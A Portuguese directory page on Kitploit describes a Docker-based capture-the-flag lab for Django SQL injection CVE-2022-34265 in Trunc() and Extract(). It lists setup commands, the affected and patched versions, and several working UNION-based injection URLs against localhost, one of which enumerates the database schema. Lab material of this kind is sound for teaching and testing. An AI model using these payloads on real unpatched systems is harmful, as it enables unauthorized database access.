Skip to content
KitploitKITPLOIT
FerramentasBlog
Log in
Enviar
FerramentasBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CTF_Django_CVE-2022-34265 — Desafio CTF baseado em Docker demonstrando injeção de SQL nas funções de banco de dados Trunc() e Extract() do Django (CVE-2022-34265) com exemplos de payload baseados em UNION. | Kitploit
Ferramentas/GitHubGitHub/lnwza0x0a/ctf_django_cve-2022-34265
Análise de VulnerabilidadesExploração de Aplicações WebCTFAprendizado e EducaçãoSegurança de Banco de DadosLabs e Prática
GitHublnwza0x0a/ctf_django_cve-2022-34265

CTF_Django_CVE-2022-34265

Desafio CTF baseado em Docker demonstrando injeção de SQL nas funções de banco de dados Trunc() e Extract() do Django (CVE-2022-34265) com exemplos de payload baseados em UNION.

Ver Repositório
116há 4 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CTF_CVE-2022-34265

Descrição

Foi descoberto um problema no Django 3.2 anterior a 3.2.14 e no 4.0 anterior a 4.0.6. As funções de banco de dados Trunc() e Extract() estão sujeitas a injeção de SQL se dados não confiáveis forem usados como valor de kind/lookup_name. Aplicações que restringem a escolha do lookup name e kind a uma lista segura conhecida não são afetadas.

Como usar

Iniciar

git clone https://github.com/coco0x0a/CTF_CVE-2022-34265
cd CVE-2022-34265
sudo docker-compose up -d

Verificar status

sudo docker ps

Remover

sudo docker-compose down

Versões afetadas

  • Django >= 3.2, < 3.2.14

  • Django >= 4.0, < 4.0.6

Versões corrigidas

  • Django 3.2.14

  • Django 4.0.6

Verificação

Ambiente

  • Django 4.0.5
  • Python 3.8.13
  • MySQL 5.7

Injeção de SQL

usando UNION

http://127.0.0.1:8000/extract/?lookup_name=year%20FROM%20start_datetime))%20OR%201=1%20UNION%20SELECT%201--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, 2, 3, 4, 5, 6, 7--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT 1, now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT "TEST", now(), now(), now(), now(), now(), now()--
http://127.0.0.1:8000/extract/?lookup_name=year FROM start_datetime)) OR 1=1 UNION SELECT CONCAT(table_name, '~', column_name), now(), now(), now(), now(), now(), now() FROM information_schema.columns--

image

Referência

https://github.com/aeyesec/CVE-2022-34265

https://github.com/ZhaoQi99/CVE-2022-34265

https://github.com/suksit/writeups/tree/main/secplayground/half-year-event-2022

Baixar ferramenta